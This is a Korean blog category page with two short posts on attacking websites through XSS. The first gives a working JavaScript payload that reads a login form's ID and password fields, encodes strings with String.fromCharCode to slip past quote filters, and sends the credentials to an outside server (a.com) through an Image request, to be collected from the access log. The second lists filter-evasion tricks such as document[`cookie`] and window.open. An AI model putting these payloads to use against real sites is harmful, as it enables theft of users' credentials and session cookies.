'웹/XSS'에 해당되는 글 2건

  1. 2019.06.26 XSS로 아이디, 패스워드 탈취
  2. 2018.10.17 xss 익스, 필터링 우회

원리는 다음과 같다.

1. document.getElementById('uid').value로 아이디, 패스워드를 가져온다.

2. 변수에 넣고 내 서버로 날리면 끝.

3. location.href같은거 쓰면 페이지 이동이 되니까, 그냥 Image().src='http://server/id/pw';

이렇게 해주고 서버에 access.log를 본다. (아니면 파라미터 넘겨도 되고)

4. 쿼터가 막혀있을 수 있으니 String.fromCharCode()를 써서 아스키화 한다.


id=document.getElementById(String.fromCharCode(117,105,100)).value;

pw=document.getElementById(String.fromCharCode(117,112,119)).value;

Image().src=String.fromCharCode(104,116,116,112,58,47,47,97,46,99,111,109,47).concat(id).concat(String.fromCharCode(47)).concat(pw);

// request to http://a.com/id/pw

' > XSS' 카테고리의 다른 글

XSS로 아이디, 패스워드 탈취  (0) 2019.06.26
xss 익스, 필터링 우회  (0) 2018.10.17
Posted by 범고래_1

.이 막혔을 때

`로 대체 가능

location.href

location[`href`]

window[`location`][`href`]

document[`cookie`]

String[`fromCharCode`]


location.href

이거는 

window.location

window.open (새창) 으로 우회 가능 !

' > XSS' 카테고리의 다른 글

XSS로 아이디, 패스워드 탈취  (0) 2019.06.26
xss 익스, 필터링 우회  (0) 2018.10.17
Posted by 범고래_1